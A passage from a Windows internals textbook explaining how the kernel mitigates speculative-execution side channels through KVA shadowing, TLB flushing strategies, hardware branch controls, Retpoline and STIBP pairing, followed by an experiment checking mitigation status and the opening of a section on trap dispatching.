[Figure: the transition space and kernel space stack layout used by KVA shadowing. Each 512-byte IST transition stack contains a KIST_BASE_FRAME that links it to the corresponding IST stack in kernel space (which holds a KIST_LINK_FRAME); the processor's TSS stores RSP 0, the IST pointers, and IoMapBase, while the KTHREAD references the thread's kernel stack.]
FIGURE 8-8 The transition stacks, IST stacks, and kernel stacks used by KVA shadowing.
The KiEnableKvaShadowing routine also determines the proper TLB flush algorithm (explained later in this section). The result of the determination (global entries or PCIDs) is stored in the global KiKvaShadowMode variable. Finally, KiEnableKvaShadowing invokes KiShadowProcessorAllocation, which maps the per-processor shared data structures in the shadow page tables. This happens only after the SYSTEM process's shadow page tables are created (and the IRQL is dropped to passive level). The shadow trap handlers, which belong to the transition address space, are mapped in the shadow page tables at the same time.
Shadow page tables
Shadow (or user) page tables are allocated by the memory manager using the internal MiAllocateProcessShadow routine when a process's address space is being created. The shadow page tables for the new process are initially created empty. The memory manager then copies all the kernel shadow top-level page table entries of the SYSTEM process in the new process shadow page table.
This allows the OS to quickly map the entire transition address space (which lives in kernel memory and is shared between all processes) in the new process. The transition mappings themselves are built by the KiShadowProcessorAllocation routine, which uses memory manager services to map individual chunks of memory in the shadow page tables and to rebuild the entire page hierarchy.
After creation, only the memory manager can write in the process page tables to map or unmap chunks of memory. When a request to allocate or map new memory into a user process address space arrives, it may happen that the top-level page table entry for a particular address would be missing. In this case, the memory manager allocates all the pages for the entire page-table hierarchy and stores the new top-level PTE in the kernel page tables. With KVA shadowing active, this is not enough: the memory manager must also replicate the top-level PTE on the shadow page table. Otherwise, the address would not be present in the user mapping after the trap handler correctly switches the page tables before returning to user mode.
Pages shared with the transition address space are instead present in both the shadow and the kernel page tables. To prevent false sharing of addresses close to the chunk of memory being mapped in the transition address space, the memory manager always recreates the page table hierarchy mapping for the PTE(s) being shared. This implies that every time the kernel needs to map some new pages in the transition address space of a process, it must replicate the mapping in all the processes' shadow page tables (the internal MiCopyTopLevelMappings routine performs exactly this operation).
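The replication requirement can be modeled with a short sketch. The helper name only echoes the role of MiCopyTopLevelMappings; it is not the real routine, and the flat dictionaries stand in for real top-level page tables:

```python
# Illustrative model of top-level PTE replication between the kernel and
# shadow page tables (names are hypothetical, not real NT structures).
def map_user_region(kernel_top, shadow_top, index, entry):
    kernel_top[index] = entry
    shadow_top[index] = entry   # replicate, or the user mapping disappears
                                # after the switch back to the shadow tables

kernel_top = {0x1F0: "kernel-entry"}   # kernel half: never replicated
shadow_top = {}

map_user_region(kernel_top, shadow_top, 0x005, "user-entry")
assert shadow_top[0x005] == "user-entry"   # visible with the shadow tables
assert 0x1F0 not in shadow_top             # kernel entries stay unmapped
```

Omitting the second assignment reproduces exactly the failure described above: the allocation would succeed in kernel mode but the address would vanish once the trap handler returns to user mode.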
TLB flushing algorithm
The TLB (translation look-aside buffer) is a cache used by the processor to quickly translate the virtual addresses that are used while executing code or accessing data. A valid entry in the TLB allows the processor to avoid consulting the page tables, making execution faster. While each process has its own user address space, the kernel address space is mostly unique and shared between all processes. Intel and AMD introduced different techniques to avoid flushing the entire TLB on every page table switch, such as the global/non-global bit and the process-context identifiers (PCIDs). These techniques are described in detail in the Intel and AMD architecture manuals and are not further discussed in this book.
The TLB flushing algorithm used with KVA shadowing has been designed to achieve the following two goals:
■	No valid kernel entries will ever be maintained in the TLB when executing a thread's user code. Otherwise, this could be leveraged by an attacker with the same speculation techniques used in Meltdown, which could lead her to read secret kernel data.
■	Execution performance must be as fast as possible, so the entire TLB is never flushed on trap entry and trap exit.
The algorithm can run on a system that either supports only the global/non-global bit or also PCIDs. In the former case, kernel pages are marked as non-global, whereas user and transition pages are marked as global; global pages are not invalidated while a page table switch happens (the system changes the value of the CR3 register). Systems with PCID support label kernel pages with PCID 2, whereas user pages are labeled with PCID 1; the global and non-global bits are ignored in this case.
When the currently executing thread ends its quantum, a context switch is initiated. When the kernel schedules execution for a thread belonging to another process address space, the TLB algorithm assures that all the user pages are removed from the TLB (in systems that support only the global/non-global bit, where user pages are marked as global, this requires an explicit flush of the entire TLB). On kernel trap exit, all the kernel entries are removed (or invalidated) from the TLB. This is easily achievable: on processors with global/non-global bit support, just a reload of the page tables forces the processor to invalidate all the non-global pages, whereas on systems with PCID support, the user-page tables are reloaded using the User PCID, which automatically invalidates all the stale kernel TLB entries.
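The two invalidation strategies can be modeled with a toy TLB. The PCID assignments (kernel = PCID 2, user = PCID 1) come from the text above; everything else in the sketch is illustrative:

```python
# Toy TLB: each entry is a tuple (virtual_page, pcid, is_global).

def flush_on_trap_exit_global(tlb):
    """Global/non-global strategy: reloading CR3 invalidates every
    non-global entry, which is where the kernel pages live."""
    return [e for e in tlb if e[2]]            # keep only global entries

def flush_on_trap_exit_pcid(tlb, user_pcid=1):
    """PCID strategy: reloading the user page tables with the User PCID
    drops the stale kernel entries (PCID 2) automatically."""
    return [e for e in tlb if e[1] == user_pcid]
```

In both models, the entries that survive a trap exit are exactly the user-visible ones, which is goal number one of the algorithm.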
The strategy allows kernel trap entries, which can happen when an interrupt is generated while the system was executing user code or when a thread invokes a system call, not to invalidate anything in the TLB.
TABLE 8-1

Configuration Type                                   User Pages           Kernel Pages         Transition Pages
KVA shadowing disabled                               Non-global           Global               N / D
KVA shadowing enabled, PCID strategy                 PCID 1, non-global   PCID 2, non-global   PCID 1, non-global
KVA shadowing enabled, global/non-global strategy    Global               Non-global           Global
Hardware indirect branch controls (IBRS, IBPB, STIBP, SSBD)
Processor manufacturers have designed hardware mitigations for various side-channel attacks. Those
mitigations have been designed to be used with the software ones. The hardware mitigations for side-
channel attacks are mainly implemented in the following indirect branch controls mechanisms, which are usually exposed through model-specific registers (MSRs):
■
Indirect Branch Restricted Speculation (IBRS) completely disables the branch predictor (and
clears the branch predictor buffer) on switches to a different security context (user vs kernel
mode or VM root vs VM non-root). If the OS sets IBRS after a transition to a more privileged
mode, predicted targets of indirect branches cannot be controlled by software that was ex-
ecuted in a less privileged mode. Additionally, when IBRS is on, the predicted targets of indirect
branches cannot be controlled by another logical processor. The OS usually sets IBRS to 1 and
keeps it on until it returns to a less privileged security context.
The implementation of IBRS depends on the CPU manufacturer: some CPUs completely disable branch predictor buffers when IBRS is set to on (describing an inhibit behavior), while some others just flush the content of the buffers (describing a flush behavior). In the latter CPUs, the IBRS mitigation control works in a very similar way to IBPB, so usually the CPU implements only IBRS.
■	Indirect Branch Predictor Barrier (IBPB) flushes the content of the branch predictors when it is set to 1, creating a barrier that prevents software that executed previously from controlling the predicted targets of indirect branches on the same logical processor.
■	Single Thread Indirect Branch Predictors (STIBP) restricts the sharing of branch prediction between logical processors on a physical CPU core. Setting STIBP to 1 on a logical processor prevents the predicted targets of indirect branches on the currently executing logical processor
from being controlled by software that executes (or executed previously) on another logical
processor of the same core.
■
Speculative Store Bypass Disable (SSBD) instructs the processor to not speculatively execute
loads until the addresses of all older stores are known. This ensures that a load operation does
not speculatively consume stale data values due to bypassing an older store on the same logi-
cal processor, thus protecting against Speculative Store Bypass attack (described earlier in the
“Other side-channel attacks” section).
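On x86 hardware, the first three of these controls live in the IA32_SPEC_CTRL MSR (IBRS is bit 0, STIBP bit 1, SSBD bit 2), while IBPB is a command issued through the IA32_PRED_CMD MSR. The following sketch composes such a value under an illustrative policy; it is not Windows's actual algorithm:

```python
# IA32_SPEC_CTRL bit layout, per the Intel and AMD architecture manuals.
IBRS  = 1 << 0   # restrict indirect branch speculation
STIBP = 1 << 1   # single-thread indirect branch predictors
SSBD  = 1 << 2   # speculative store bypass disable

def spec_ctrl_for(kernel_mode, ssbd_supported, stibp_user=False):
    """Illustrative policy: IBRS plus SSBD while running kernel code,
    optionally STIBP for user threads (for example, when STIBP pairing
    is not available)."""
    value = 0
    if kernel_mode:
        value |= IBRS
        if ssbd_supported:
            value |= SSBD
    elif stibp_user:
        value |= STIBP
    return value
```

The real kernel recomputes such a value on context switches, trap entries, and trap exits, as the next paragraphs describe.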
The NT kernel employs a complex algorithm to determine the value of the described indirect branch controls, which are in general changed on context switches, trap entries, and trap exits. On compatible systems, the system runs kernel code with IBRS always on (except when Retpoline is enabled). When no IBRS is available (but IBPB and STIBP are supported), the kernel runs with STIBP on and emits an IBPB on every kernel trap entry (in this way, the branch predictor buffer cannot be influenced by code that ran in another security context). SSBD, when supported by the CPU, is always enabled in kernel mode.
User-mode threads are executed with no hardware speculation mitigations enabled or just with STIBP on (depending on STIBP pairing being enabled, as explained in the next section). The protection against Speculative Store Bypass must be manually enabled if needed through the global or per-process Speculation feature. Indeed, all the speculation mitigations can be fine-tuned through a registry bitmask in which each bit corresponds to an individual setting. Table 8-2 describes individual feature settings and their meaning.
TABLE 8-2

Value     Meaning
0x1       Disable IBRS except for non-nested root partition
0x2
0x4
0x8       Always set SSBD in kernel and user
0x10      Set SSBD only in kernel mode (leaving user-mode code to be vulnerable to SSB attacks)
0x20      Always keep STIBP on for user-threads, regardless of STIBP pairing
0x40      Disables the default speculation mitigation strategy (for AMD systems only) and enables the user-to-user only mitigation. When this flag is set, no speculation controls are set when running in kernel mode.
0x80      Always disable STIBP pairing
0x100     Always disable Retpoline
0x200     Enable Retpoline regardless of the CPU support of IBPB or IBRS (Retpoline needs at least IBPB to properly protect against Spectre v2)
0x20000   Disable Import Optimization regardless of Retpoline
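A small decoder for such a bitmask, using only the values listed in Table 8-2 (the Python names and the dictionary itself are illustrative, not the kernel's symbols):

```python
# Illustrative mapping of the documented bit values from Table 8-2.
FEATURE_FLAGS = {
    0x1:     "Disable IBRS except for non-nested root partition",
    0x8:     "Always set SSBD in kernel and user",
    0x10:    "Set SSBD only in kernel mode",
    0x20:    "Always keep STIBP on for user-threads",
    0x40:    "User-to-user only mitigation (AMD)",
    0x80:    "Always disable STIBP pairing",
    0x100:   "Always disable Retpoline",
    0x200:   "Enable Retpoline regardless of IBPB/IBRS support",
    0x20000: "Disable Import Optimization",
}

def decode_feature_settings(value):
    """Return the meaning of every flag set in the bitmask, in bit order."""
    return [name for bit, name in sorted(FEATURE_FLAGS.items())
            if value & bit]
```

For instance, a value of 0x120 combines "Always keep STIBP on for user-threads" (0x20) with "Always disable Retpoline" (0x100).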
Retpoline and import optimization
Keeping hardware mitigations such as IBRS and IBPB always enabled carries strong performance penalties, which were not acceptable for games and mission-critical applications, which were running with a lot of performance degradation. The mitigation that was bringing most of the performance degradation was IBRS, while used to protect against Spectre. Protecting against the first variant of Spectre was possible without using any hardware mitigations thanks to the memory fence instructions. A good example is the LFENCE, available in the x86 architecture. These instructions force the processor not to execute any new operations speculatively before the fence itself completes. Only when the fence completes (and all the instructions located before it have been retired) will the processor start to execute (and to speculate) new opcodes. The second variant of Spectre was still requiring hardware mitigations, though, which implies all the performance problems brought by IBRS and IBPB. To overcome the problem, Retpoline, invented by Google engineers, allows indirect branches to be isolated from speculative execution. Instead of performing a vulnerable indirect call, the processor jumps to a safe control sequence, which dynamically modifies the stack, captures eventual speculation, and lands on the new target thanks to a “return” operation.
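The canonical sequence published by Google looks roughly like the following sketch (Windows keeps the original branch target in the R10 register, as described later in this section):

```asm
    call set_up_target        ; replaces: jmp/call through a register
capture_spec:
    pause                     ; speculative execution lands here and
    lfence                    ;   spins harmlessly until it is squashed
    jmp  capture_spec
set_up_target:
    mov  [rsp], r10           ; overwrite the return address with the
                              ;   real branch target (held in R10)
    ret                       ; architectural execution lands on the real
                              ;   target; the return predictor points at
                              ;   capture_spec instead
```

The trick is that the return predictor, not the indirect branch predictor, decides where speculation goes, and it is steered into the harmless capture_spec loop.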
FIGURE 8-9 Retpoline code sequence of x86 CPUs.
In Windows, Retpoline is implemented in the NT kernel, which can apply the Retpoline code sequence to itself and to external driver images dynamically through the Dynamic Value Relocation Table (DVRT). When a kernel image is compiled with Retpoline enabled (through a compatible compiler), the compiler inserts an entry in the image's DVRT for each indirect branch present in the code, describing its address and type. The opcode that performs the indirect branch is kept as it is in the final code but augmented with a variable size padding. The entry in the DVRT includes all the information that the NT kernel needs to modify the indirect branch's opcode dynamically. With this architecture, external drivers compiled with Retpoline support can run also on older OS versions, which will simply skip parsing the entries in the DVRT table.
Note The DVRT was originally developed for supporting kernel ASLR (Address Space Layout
Randomization, discussed in Chapter 5 of Part 1). The table was later extended to include
Retpoline descriptors. The system can identify which version of the table an image includes.
In phase -1 of its initialization, the kernel detects whether the processor is vulnerable to Spectre, and,
in case the system is compatible and enough hardware mitigations are available, it enables Retpoline
and applies it to the NT kernel image and the HAL. The RtlPerformRetpolineRelocationsOnImage rou-
tine scans the DVRT and replaces each indirect branch described by an entry in the table with a direct
branch, which is not vulnerable to speculative attacks, targeting the Retpoline code sequence. The
original target address of the indirect branch is saved in a CPU register (R10 in AMD and Intel proces-
sors), with a single instruction that overwrites the padding generated by the compiler. The Retpoline code sequence itself is stored in a dedicated code section of the image. Before being started, boot drivers are physically relocated by the internal MiReloadBootLoadedDrivers routine, which also applies Retpoline to each of them. All the boot drivers, the NT kernel, and HAL images are allocated in a contiguous virtual address space by the Windows Loader and do not have an associated control area, rendering them not pageable. This means that all the memory backing the images is always resident, and the NT kernel can use the same RtlPerformRetpolineRelocationsOnImage function to modify each indirect branch in the code directly.
If HVCI is enabled, the system must call the Secure Kernel to apply Retpoline (through the PERFORM_RETPOLINE_RELOCATIONS secure call).

Note Kernel code sections are protected: security features such as Kernel Patch Protection (see Chapter 7 for further details) initialize and protect some of them. It is illegal for drivers and the NT kernel itself to modify code sections of protected drivers.
Runtime drivers, as explained in Chapter 5 of Part 1, are loaded by the NT memory manager, which maps the driver's image through a section object whose pages are brought into memory on demand by the page fault handler. Windows applies Retpoline on the shared pages pointed by the prototype PTEs. If the same section is also mapped by a user-mode application, the memory manager creates new private pages and copies the content of the shared pages in the private ones, reverting Retpoline (and Import Optimization) on the private copies.
Note On some systems and CPU configurations, Retpoline cannot be enabled because it would not be able to protect against Spectre v2. In this situation, only hardware mitigations can be applied. Enhanced IBRS (a new hardware mitigation) solves the performance problems of IBRS.
The Retpoline bitmap
One of the original design goals (restraints) of the Retpoline implementation in Windows was to sup-
port a mixed environment composed of drivers compatible with Retpoline and drivers not compatible
with it, while maintaining the overall system protection against Spectre v2. This implies that drivers
that do not support Retpoline should be executed with IBRS on (or STIBP followed by an IBPB on kernel
entry, as discussed previously in the ”Hardware indirect branch controls” section), whereas others can
run without any hardware speculation mitigations enabled (the protection is brought by the Retpoline
code sequences and memory fences).
To dynamically achieve compatibility with older drivers, in the phase 0 of its initialization, the NT kernel builds the Retpoline bitmap, in which each bit tracks a chunk of kernel address space: a 1 means that the chunk of address space contains Retpoline-compatible code; a 0 means the opposite. The NT kernel then sets to 1 the
bits referring to the address spaces of the HAL and NT images (which are always Retpoline compatible).
Every time a new kernel image is loaded, the system tries to apply Retpoline to it. If the application suc-
ceeds, the respective bits in the Retpoline bitmap are set to 1.
The Retpoline code sequence is augmented to include a bitmap check: Every time an indirect branch
is performed, the system checks whether the original call target resides in a Retpoline-compatible
module. In case the check succeeds (and the relative bit is 1), the system executes the Retpoline code sequence and lands on the branch target safely. Otherwise (when the relative bit in the Retpoline bitmap is 0), a Retpoline exit sequence is initialized. The RUNNING_NON_RETPOLINE_CODE flag is set in the current CPU's PRCB, the needed hardware mitigations are enabled by writing the SPEC_CONTROL MSR, and the processor then lands on the original branch target (in this case, the hardware mitigations provide the needed protection).
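The bitmap check can be modeled as follows; the 64 KB chunk granularity is an assumption of the sketch, not a documented value:

```python
CHUNK_SHIFT = 16  # assume one bit per 64 KB chunk of kernel address space

class RetpolineBitmap:
    """Toy model of the Retpoline bitmap consulted on every indirect branch."""

    def __init__(self):
        self.bits = set()   # indices of Retpoline-compatible chunks

    def mark_compatible(self, start, size):
        """Called after Retpoline has been applied to a loaded image."""
        first = start >> CHUNK_SHIFT
        last = (start + size - 1) >> CHUNK_SHIFT
        for chunk in range(first, last + 1):
            self.bits.add(chunk)

    def is_compatible(self, target):
        """True: execute the Retpoline code sequence. False: run the
        Retpoline exit sequence and re-enable hardware mitigations."""
        return (target >> CHUNK_SHIFT) in self.bits
```

The point of the design is that the per-branch check is a single bit test, so mixing Retpoline-compatible and incompatible drivers costs almost nothing on the hot path.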
When the thread quantum ends, and the scheduler selects a new thread, it saves the Retpoline status (represented by the presence of the RUNNING_NON_RETPOLINE_CODE flag) of the current processor in the KTHREAD data structure of the old thread. In this way, when the old thread is selected again for execution (or a kernel trap entry happens), the system knows that it needs to re-enable the needed hardware speculation mitigations with the goal of keeping the system always protected.
26
CHAPTER 8 System mechanisms
Import optimization
Retpoline entries in the DVRT also describe indirect branches targeting imported functions. An imported control transfer entry in the DVRT describes this kind of branch by using an index referring to the IAT entry of the target function. (The IAT is the image's Import Address Table, an array of imported functions' pointers compiled by the loader.) After the Windows loader has compiled the IAT, it is unlikely that its content would ever change. As shown in Figure 8-10, it is not needed to transform an indirect branch targeting an imported function to a Retpoline one because the NT kernel can ensure that the virtual addresses of the two images (caller and callee) are close enough to directly invoke the target (less than 2 GB).
FIGURE 8-10 Different indirect branches on the ExAllocatePool function.
Import optimization (internally also known as “import linking”) is the feature that uses Retpoline
dynamic relocations to transform indirect calls targeting imported functions into direct branches. If
a direct branch is used to divert code execution to an imported function, there is no need to apply
Retpoline because direct branches are not vulnerable to speculation attacks. The NT kernel ap-
plies Import Optimization at the same time it applies Retpoline, and even though the two features are not dependent on each other, they share the same implementation. Thanks to Import Optimization, Windows has been able to gain a performance boost even on systems that are not vulnerable to Spectre v2. (A direct branch does not require any additional memory access.)
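The reachability decision reduces to a signed 32-bit displacement check; the 5-byte E8 rel32 call encoding is the usual x86 form, and the helper itself is illustrative:

```python
REL32_LIMIT = 2 ** 31   # direct near branches use a signed 32-bit displacement

def pick_branch_kind(call_site, target):
    """Decide how a call to an imported function gets rewritten:
    a direct branch when the callee is within rel32 range of the
    caller, otherwise the Retpoline sequence is still required."""
    displacement = target - (call_site + 5)   # 5 = size of an E8 rel32 call
    if -REL32_LIMIT <= displacement < REL32_LIMIT:
        return "direct"
    return "retpoline"
```

Because the NT kernel controls where kernel images are loaded, it can keep caller and callee within the ±2 GB window, so in practice the "direct" case dominates.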
STIBP pairing
In hyperthreaded systems, for protecting user-mode code against Spectre v2, the system should run
user threads with at least STIBP on. On nonhyperthreaded systems, this is not needed: protection
against a previous user-mode thread speculation is already achieved thanks to the IBRS being enabled
while previously executing kernel-mode code. In case Retpoline is enabled, the needed IBPB is emitted on the first kernel trap exit. This ensures that the branch prediction buffer is empty before executing the code of the user thread.
Leaving STIBP enabled in a hyper-threaded system has a performance penalty, so by default
it is disabled for user-mode threads, leaving a thread potentially vulnerable to speculation from a sibling SMT thread. The end-user can manually enable STIBP for user threads through the "Always keep STIBP on for user-threads" (0x20) mitigation option described in Table 8-2.
The described scenario is not ideal. A better solution is implemented in the STIBP pairing mecha-
nism. STIBP pairing is enabled by the I/O manager in phase 1 of the NT kernel initialization (using the
KeOptimizeSpecCtrlSettings function) only under certain conditions: the system should have hyperthreading enabled and support both IBPB and STIBP. Furthermore, STIBP pairing is compatible only on non-nested virtualized environments or when Hyper-V is disabled (refer to Chapter 9 for further details.)
In an STIBP pairing-enabled environment, each process has a security domain identifier (stored in the EPROCESS data structure), which is represented by a 64-bit number. The system security domain identifier (which equals 0) is assigned only to processes running under the System or a fully administrative token. Nonsystem security domains are assigned at process creation time (by the internal PspInitializeProcessSecurity function) following these rules:
■
If the new process is created without a new primary token explicitly assigned to it, it obtains the
same security domain of the parent process that creates it.
■	If the new process is created using a new primary token (generated through the CreateProcessAsUser or CreateProcessWithLogon APIs, for example), a new user security domain ID is generated for the new process, starting from the internal PsNextSecurityDomain symbol.
The latter is incremented every time a new domain ID is generated (this ensures that during the
system lifetime, no security domains can collide).
■	Note that a new primary token can be also assigned using the NtSetInformationProcess API (with the ProcessAccessToken information class) after the process has been created. For the API to succeed, the process should have been created as suspended (no threads run in it). At this stage, the process still has its original token in an unfrozen state. A new security domain is assigned following the same rules described earlier.
Security domains can also be assigned manually to different processes belonging to the
same group. An application can replace the security domain of a process with another one
of a process belonging to the same group using the NtSetInformationProcess API with the
ProcessCombineSecurityDomainsInformation class. The API accepts two process handles and replaces the security domain of the first process only in case the two processes can open each other with the PROCESS_VM_WRITE and PROCESS_VM_OPERATION access rights.
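The assignment rules above can be condensed into a toy model. The function and counter names are made up; PsNextSecurityDomain's monotonic behavior is modeled by a simple counter:

```python
import itertools

_next_domain = itertools.count(100)   # stand-in for PsNextSecurityDomain
SYSTEM_DOMAIN = 0                     # the system security domain

def assign_security_domain(parent_domain, new_primary_token):
    """Rule 1: without a new primary token, inherit the parent's domain.
    Rule 2: a new primary token gets a fresh ID; the counter only grows,
    so domains never collide during the system lifetime."""
    if new_primary_token:
        return next(_next_domain)
    return parent_domain

def combine_security_domains(proc_a, proc_b):
    """Sketch of ProcessCombineSecurityDomainsInformation: place both
    processes in the same security domain."""
    proc_b["domain"] = proc_a["domain"]
```

The never-reused counter is what guarantees the collision-freedom property the text mentions.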
Security domains allow the STIBP pairing mechanism to work. STIBP pairing links a logical proces-
sor (LP) with its sibling (both share the same physical core; in this section, we use the terms LP and CPU interchangeably). Two LPs are paired by the STIBP pairing algorithm (implemented in the internal
KiUpdateStibpPairing function) only when the security domain of the local CPU is the same as the one
of the remote CPU, or one of the two LPs is Idle. In these cases, both the LPs can run without STIBP be-
ing set and still be implicitly protected against speculation (there is no advantage in attacking a sibling
CPU running in the same security context).
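The pairing condition itself reduces to a small predicate, sketched here (the real KiUpdateStibpPairing is a full state machine):

```python
def can_pair_without_stibp(local_domain, remote_domain,
                           local_idle=False, remote_idle=False):
    """Two sibling LPs may both run with STIBP clear when they share a
    security domain or when either one of them is idle: there is no
    advantage in attacking a sibling running in the same security
    context, and an idle sibling runs no attacker-controlled code."""
    return local_idle or remote_idle or local_domain == remote_domain
```

Whenever the predicate turns false (for example, after a context switch to a different security domain), STIBP must be re-enabled on the LPs.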
The STIBP pairing algorithm is implemented in the KiUpdateStibpPairing function and includes a full
state machine. The routine is invoked by the trap exit handler (invoked when the system exits the kernel for executing a user-mode thread) only in case the pairing state of the current LP is stale. The pairing state of an LP can become stale mainly for two reasons:
■	The NT scheduler has selected a new thread to be executed in the current CPU. If the new thread's security domain is different from the previous one, the pairing state is marked as stale. This allows the STIBP pairing algorithm to re-evaluate the pairing state of the two LPs.
■
When the sibling CPU exits from its idle state, it requests the remote CPU to re-evaluate its
STIBP pairing state.
Note that when an LP is running code with STIBP enabled, it is protected from the sibling CPU
speculation. STIBP pairing has been developed based also on the opposite notion: when an LP executes
with STIBP enabled, it is guaranteed that its sibling CPU is protected against itself. This implies that
when a context switches to a different security domain, there is no need to interrupt the sibling CPU
even though it is running user-mode code with STIBP disabled.
The described scenario is not true only when the scheduler selects a VP-dispatch thread (backing
a virtual processor of a VM in case the Root scheduler is enabled; see Chapter 9 for further details)
belonging to the VMMEM process. In this case, the system immediately sends an IPI to the sibling
thread for updating its STIBP pairing state. Indeed, a VP-dispatch thread runs guest-VM code, which
can always decide to disable STIBP, moving the sibling thread into an unprotected state (both run with STIBP disabled).
EXPERIMENT: Querying system side-channel mitigation status
Windows exposes side-channel mitigation information through the SystemSpeculationControl
Information and SystemSecureSpeculationControlInformation information classes used by the
NtQuerySystemInformation native API. Multiple tools exist that interface with this API and show
to the end user the system side-channel mitigation status:
■	The SpeculationControl PowerShell script, maintained by Microsoft, which is open source and available at the following GitHub repository: https://github.com/microsoft/SpeculationControl
■
The SpecuCheck tool, developed by Alex Ionescu (one of the authors of this book),
which is open source and available at the following GitHub repository:
https://github.com/ionescu007/SpecuCheck
■
The SkTool, developed by Andrea Allievi (one of the authors of this book) and distributed
(at the time of this writing) in newer Insider releases of Windows.
All of the three tools yield more or less the same results. However, only the SkTool is able to show the side-channel mitigations implemented in the hypervisor and the Secure Kernel. In this experiment, you discover which mitigations have been enabled in your system. Download SpecuCheck and execute it by opening a command prompt window (type cmd in the Cortana search box). You should get output like the following:
SpecuCheck v1.1.1 -- Copyright(c) 2018 Alex Ionescu
https://ionescu007.github.io/SpecuCheck/ -- @aionescu
--------------------------------------------------------
Mitigations for CVE-2017-5754 [rogue data cache load]
--------------------------------------------------------
[-] Kernel VA Shadowing Enabled:
yes
> Unnecessary due lack of CPU vulnerability: no
> With User Pages Marked Global:
no
> With PCID Support:
yes
> With PCID Flushing Optimization (INVPCID): yes
Mitigations for CVE-2018-3620 [L1 terminal fault]
[-] L1TF Mitigation Enabled:
yes
> Unnecessary due lack of CPU vulnerability: no
> CPU Microcode Supports Data Cache Flush: yes
> With KVA Shadow and Invalid PTE Bit:
yes
(The output has been trimmed for space reasons.)
You can also download the latest Windows Insider release and try the SkTool. When launched with no command-line arguments, by default the tool displays the status of the hypervisor and the Secure Kernel. All the mitigations can be shown with the /mitigations command-line argument:
Hypervisor / Secure Kernel / Secure Mitigations Parser Tool 1.0
Querying Speculation Features... Success!
This system supports Secure Speculation Controls.
System Speculation Features.
Enabled: 1
Hardware support: 1
IBRS Present: 1
STIBP Present: 1
SMEP Enabled: 1
Speculative Store Bypass Disable (SSBD) Available: 1
Speculative Store Bypass Disable (SSBD) Supported by OS: 1
Branch Predictor Buffer (BPB) flushed on Kernel/User transition: 1
Retpoline Enabled: 1
Import Optimization Enabled: 1
SystemGuard (Secure Launch) Enabled: 0 (Capable: 0)
SystemGuard SMM Protection (Intel PPAM / AMD SMI monitor) Enabled: 0
Secure system Speculation Features.
KVA Shadow supported: 1
KVA Shadow enabled: 1
KVA Shadow TLB flushing strategy: PCIDs
Minimum IBPB Hardware support: 0
IBRS Present: 0 (Enhanced IBRS: 0)
STIBP Present: 0
SSBD Available: 0 (Required: 0)
Branch Predictor Buffer (BPB) flushed on Kernel/User transition: 0
Branch Predictor Buffer (BPB) flushed on User/Kernel and VTL 1 transition: 0
L1TF mitigation: 0
Microarchitectural Buffers clearing: 1
Trap dispatching
Interrupts and exceptions are operating system conditions that divert the processor to code outside the normal flow of control. Either hardware or software can detect them. The term trap refers to a processor's mechanism for capturing an executing thread when an exception or an interrupt occurs and transferring control to a fixed location in the operating system. In Windows, the processor transfers control to a trap handler, which is a function specific to a particular interrupt or exception. Figure 8-11 illustrates some of the conditions that activate trap handlers.
The kernel distinguishes between interrupts and exceptions in the following way. An interrupt is an
asynchronous event (one that can occur at any time) that is typically unrelated to what the processor is
executing. Interrupts are generated primarily by I/O devices, processor clocks, or timers, and they can
be enabled (turned on) or disabled (turned off). An exception, in contrast, is a synchronous condition that usually results from the execution of a particular instruction. (Aborts, such as machine checks, are a type of processor exception that's typically not associated with instruction execution.) Both exceptions and aborts are sometimes called faults, such as when talking about a page fault or a double fault.
Running a program for a second time with the same data under the same conditions can reproduce
exceptions. Examples of exceptions include memory-access violations, certain debugger instructions,
and divide-by-zero errors. The kernel also regards system service calls as exceptions (although technically they're system traps).
[Figure 8-11 depicts the trap handlers: an interrupt is dispatched to interrupt service routines; a system service call to the system services; virtual address exceptions to the virtual memory manager's pager; and hardware and software exceptions, through the exception dispatcher (with an exception frame), to the exception handlers.]
FIGURE 8-11 Trap dispatching.
Either hardware or software can generate exceptions and interrupts. For example, a bus error exception is caused by a hardware problem, whereas a divide-by-zero exception is the result of a software bug. Likewise, an I/O device can generate an interrupt, or the kernel itself can issue a software interrupt
(such as an APC or DPC, both of which are described later in this chapter).
When a trap occurs, the processor first checks whether the current Code Segment (CS) is in CPL 0 or below (i.e., if the current thread was running in kernel mode or user mode). In the case where the thread was already running in Ring 0, the processor saves (or pushes) on the current stack the following information, which represents a kernel-to-kernel transition:
■	The current processor flags (EFLAGS/RFLAGS)
■	The current code segment (CS)
■	The current program counter (EIP/RIP)
■	Optionally, for certain kinds of exceptions, an error code
If the thread was instead running in user mode (Ring 3), the processor looks up the current TSS based on the Task Register (TR) and switches to the SS0/ESP0 on x86 or simply RSP0 on x64, as described in the “Task state segments” section earlier in this chapter. Now that the processor is executing on the kernel stack, it saves the previous SS (the user-mode value) and the previous stack pointer before saving the information described earlier. Saving these values serves two purposes: First, it allows the kernel to resume the thread's execution as if nothing had happened. Second, it allows the operating system to know (based on the saved CS value) where the trap came from—for example, to know if an exception came from user-mode code or from a kernel system call.
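The two entry flavors can be modeled as a push sequence (a simplified sketch of what the processor does in hardware; the names are illustrative):

```python
def trap_entry_pushes(from_user_mode, has_error_code):
    """Return the values the CPU pushes on the kernel stack, oldest
    first, when a trap occurs. Kernel-to-kernel traps reuse the current
    stack; traps from user mode first switch to the kernel stack taken
    from the TSS (RSP0) and additionally save the old SS:RSP."""
    frame = []
    if from_user_mode:
        frame += ["SS (user)", "RSP (user)"]
    frame += ["RFLAGS", "CS", "RIP"]
    if has_error_code:
        frame.append("error code")
    return frame
```

The saved CS value is what later lets the kernel tell the two cases apart, as the text above explains.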
At this point, the rest of the machine state—including registers such as EAX, EBX, ECX, EDI, and so on—is saved in a trap frame, a data structure allocated by Windows in the thread's kernel stack. The trap frame stores the execution state of the thread. (You can view its definition by typing the dt nt!_KTRAP_FRAME command in the kernel debugger, or, for more information, see
Part 1.) The kernel handles software interrupts either as part of hardware interrupt handling or synchro-
nously when a thread invokes kernel functions related to the software interrupt.
In most cases, the kernel installs front-end, trap-handling functions that perform general trap-handling tasks before and after transferring control to other functions that field the trap. For example, if the condition was a device interrupt, a kernel hardware interrupt trap handler transfers control to the interrupt service routine (ISR) that the device driver provided for the interrupting device. If the condition was caused by a call to a system service, the general system service trap handler transfers control to the specified system service function. The kernel also installs trap handlers for traps that it doesn't expect to see or doesn't handle. These are sometimes called spurious or unexpected traps. The trap handlers typically execute
the system function KeBugCheckEx, which halts the computer when the kernel detects problematic
or incorrect behavior that, if left unchecked, could result in data corruption. The following sections
describe interrupt, exception, and system service dispatching in greater detail.
Interrupt dispatching
Hardware-generated interrupts typically originate from I/O devices that must notify the processor
